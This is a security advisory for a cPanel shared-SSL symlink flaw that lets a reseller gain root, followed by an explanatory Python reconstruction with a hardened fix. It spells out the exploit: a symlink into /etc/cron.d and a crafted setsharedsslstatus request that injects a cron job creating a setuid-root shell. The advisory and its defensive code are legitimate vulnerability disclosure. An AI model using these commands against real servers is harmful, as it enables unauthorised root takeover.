cPanel 11.11.0-STABLE_16789 - shared SSL cert root privilege escalation



DESCRIPTION


When a reseller used WHM to set an SSL certificate as a shared certificate, the file ".sharedsslcert" was written into the user's home directory by a process running as root. Because the reseller controlled both the contents of that file and the user's home directory, they could first replace ".sharedsslcert" with a symlink and then have root write attacker-chosen content through it, effectively creating or overwriting any file on the box (a classic symlink attack).



IMPACT


Resellers could escalate their privileges to root.


Step 1:

[user@host ~]$ ln -s /home/user/.sharedsslcert /etc/cron.d/new_cron_job

By default, the .sharedsslcert file contains the domain name from the certificate. However, the contents were taken verbatim from the "crt" request parameter, so the reseller could supply arbitrary text, including spaces and newlines, rather than a hostname.


Step 2:

GET /scripts2/setsharedsslstatus?crt=*%20*%20*%20*%20*%20root%20chown%20root.root%20 \
/home/$user/suid_shell;chmod%204755%20/home/$user/suid_shell%0a\0\r\n HTTP/1.0


Because root followed the symlink planted in Step 1, that request created "/etc/cron.d/new_cron_job" with the following contents (where /home/$user/suid_shell is a copy of a shell the reseller placed beforehand; once cron runs the job as root, that copy is a setuid-root shell):

* * * * * root chown root.root /home/$user/suid_shell;chmod 4755 /home/$user/suid_shell


Even when the shared SSL feature was disabled for resellers in WHM, a request to /scripts2/setsharedsslstatus was still accepted, so the WHM feature toggle offered no protection against this attack.
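The two defects behind this advisory, a root-owned write that follows a symlink in a user-controlled directory and a value written without validation, are reproduced below as an added example. It is not cPanel code (cPanel is written in Perl; this Python stands in for whatever routine wrote "crt" into ~user/.sharedsslcert) and the function names, the hardened variant and the temp-directory scenario are all this editor's assumptions. The demo plays out Step 1 and Step 2 against a scratch directory, with a plain file standing in for /etc/cron.d/new_cron_job, so it runs unprivileged; it then shows the hardened write refusing the planted symlink and rejecting the cron payload.

```python
"""Reconstruction of the write pattern behind the cPanel shared-SSL advisory.

Assumption, not cPanel's code: write_shared_cert_vulnerable() models the
root-privileged write described in the advisory; write_shared_cert_hardened()
is a suggested safe form.  Paths and names are constructed for the demo.
"""
import os
import re
import stat
import tempfile

# One DNS hostname: dot-separated labels of letters, digits and hyphens.
# Whitespace, '*' and ';' (everything the cron payload relies on) fail this.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# The Step 2 payload, URL-decoded (constructed from the advisory text).
CRON_PAYLOAD = ("* * * * * root chown root.root /home/user/suid_shell;"
                "chmod 4755 /home/user/suid_shell")


def write_shared_cert_vulnerable(home, crt):
    """As the advisory describes it: open() follows whatever ~user/.sharedsslcert
    points at, and the content is whatever the reseller sent in "crt"."""
    with open(os.path.join(home, ".sharedsslcert"), "w") as fh:
        fh.write(crt + "\n")


def write_shared_cert_hardened(home, crt, owner_uid):
    """Suggested fix: validate the value, never follow a symlink at the final
    path component, and inspect the opened file before truncating it.

    Caveat: O_NOFOLLOW only covers the last component.  The real fix is also
    to stop doing this write as root (e.g. drop to the user first).
    """
    if not HOSTNAME_RE.match(crt):
        raise ValueError("crt is not a hostname: %r" % (crt,))
    path = os.path.join(home, ".sharedsslcert")
    try:
        # No O_TRUNC here: a hard link to a root-owned file would already be
        # emptied before we could fstat() it.  Truncate only after the checks.
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW, 0o644)
    except OSError as exc:  # ELOOP: the final component is a symlink
        raise PermissionError("refusing to write through %s: %s" % (path, exc))
    try:
        st = os.fstat(fd)
        if (not stat.S_ISREG(st.st_mode) or st.st_nlink != 1
                or st.st_uid != owner_uid):
            raise PermissionError("unexpected file at %s" % path)
        os.ftruncate(fd, 0)
        os.write(fd, (crt + "\n").encode())
    finally:
        os.close(fd)


def demo():
    """Constructed scenario: 'new_cron_job' plays /etc/cron.d/new_cron_job,
    'home' plays the reseller's home directory with the Step 1 symlink."""
    result = {}
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "new_cron_job")
        home = os.path.join(tmp, "home")
        os.mkdir(home)
        open(target, "w").close()
        link = os.path.join(home, ".sharedsslcert")
        os.symlink(target, link)                       # Step 1

        write_shared_cert_vulnerable(home, CRON_PAYLOAD)  # Step 2 as root
        with open(target) as fh:
            result["cron_overwritten"] = fh.read() == CRON_PAYLOAD + "\n"

        # Hardened write with a benign value still refuses the planted symlink.
        try:
            write_shared_cert_hardened(home, "www.example.com", os.getuid())
            result["hardened_refused_symlink"] = False
        except PermissionError:
            result["hardened_refused_symlink"] = True

        # ...and rejects the cron payload outright, symlink or not.
        os.unlink(link)
        try:
            write_shared_cert_hardened(home, CRON_PAYLOAD, os.getuid())
            result["payload_rejected"] = False
        except ValueError:
            result["payload_rejected"] = True

        # With no symlink and a real hostname the hardened write succeeds.
        write_shared_cert_hardened(home, "www.example.com", os.getuid())
        with open(link) as fh:
            result["hardened_clean_write"] = fh.read()
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-24s %r" % (key, value))
```

The order of checks matters: the validation alone would have stopped the cron injection but not the arbitrary-file-overwrite, and O_NOFOLLOW alone would have stopped the symlink but left a hard-link variant, which is why the hardened form also checks st_nlink and ownership before truncating.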